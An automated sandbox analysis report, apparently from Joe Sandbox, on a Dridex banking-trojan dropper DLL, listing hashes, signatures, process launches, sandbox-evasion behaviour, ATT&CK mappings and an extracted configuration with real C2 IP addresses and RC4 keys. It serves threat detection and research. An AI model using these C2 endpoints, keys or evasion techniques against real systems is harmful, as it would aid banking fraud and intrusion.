Play interactive tour

Edit tour

Analysis Report BJKPKLUPiD

Overview

General Information

Sample Name:	BJKPKLUPiD (renamed file extension from none to dll)
Analysis ID:	392883
MD5:	ffc39c266b67da9e1847106d0adc566b
SHA1:	37f852cd92c6191ae6b34ffb6ce69646b09b2900
SHA256:	b3bc5083836846848f682dc1a2ab091ac3c5256d6924952232c524287911d6fd
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 7016 cmdline: loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 7032 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7060 cmdline: rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4628 cmdline: rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 428 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.591554766.0000000070991000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.rundll32.exe.70990000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.70990000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.70990000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: BJKPKLUPiD.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.970000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 2.2.rundll32.exe.570000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.7f0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: BJKPKLUPiD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: BJKPKLUPiD.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.406484081.00000000052BB000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbH source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbr source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbt source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.398577089.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.476548570.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.398577089.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.476548570.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp, BJKPKLUPiD.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: glu32.pdb\ source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000007.00000002.441236394.0000000002FD2000.00000004.00000010.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: BJKPKLUPiD.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

Source: loaddll32.exe, 00000000.00000002.447996822.0000000000B7B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.591554766.0000000070991000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.70990000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.70990000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709A218C NtDelayExecution,	2_2_709A218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709A2790 NtAllocateVirtualMemory,	2_2_709A2790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7099BC00 NtClose,	2_2_7099BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_70991494	2_2_70991494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709A07CC	2_2_709A07CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709A14D8	2_2_709A14D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709984E4	2_2_709984E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7099A5A4	2_2_7099A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_70999144	2_2_70999144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_709A92DC	2_2_709A92DC

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 428

Source: BJKPKLUPiD.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs BJKPKLUPiD.dll

Source: BJKPKLUPiD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: BJKPKLUPiD.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7016

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC3D.tmp

Jump to behavior

Source: BJKPKLUPiD.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 428
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1	Jump to behavior

Source: BJKPKLUPiD.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: BJKPKLUPiD.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.406484081.00000000052BB000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbH source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbr source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbt source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.398577089.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.476548570.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.398577089.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.476548570.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp, BJKPKLUPiD.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: glu32.pdb\ source: WerFault.exe, 00000007.00000003.420400278.00000000056A8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000007.00000003.420389433.00000000056A2000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.420383659.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.420425791.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000007.00000002.441236394.0000000002FD2000.00000004.00000010.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_7099F744 push esi; mov dword ptr [esp], 00000000h

2_2_7099F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 898

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 552

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_709A07CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_709A07CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 00000007.00000002.442479782.0000000005370000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000007.00000002.442479782.0000000005370000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000007.00000002.442479782.0000000005370000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000007.00000002.442479782.0000000005370000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_70996DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_70996DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_709A3060 RtlAddVectoredExceptionHandler,

2_2_709A3060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.591267124.00000000033B0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.590283471.00000000033B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.591267124.00000000033B0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.590283471.00000000033B0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.591267124.00000000033B0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.590283471.00000000033B0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000002.00000002.591267124.00000000033B0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.590283471.00000000033B0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_70996DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_70996DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery111	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BJKPKLUPiD.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.970000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
2.2.rundll32.exe.570000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.7f0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	BJKPKLUPiD.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392883
Start date:	19.04.2021
Start time:	23:37:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	BJKPKLUPiD (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
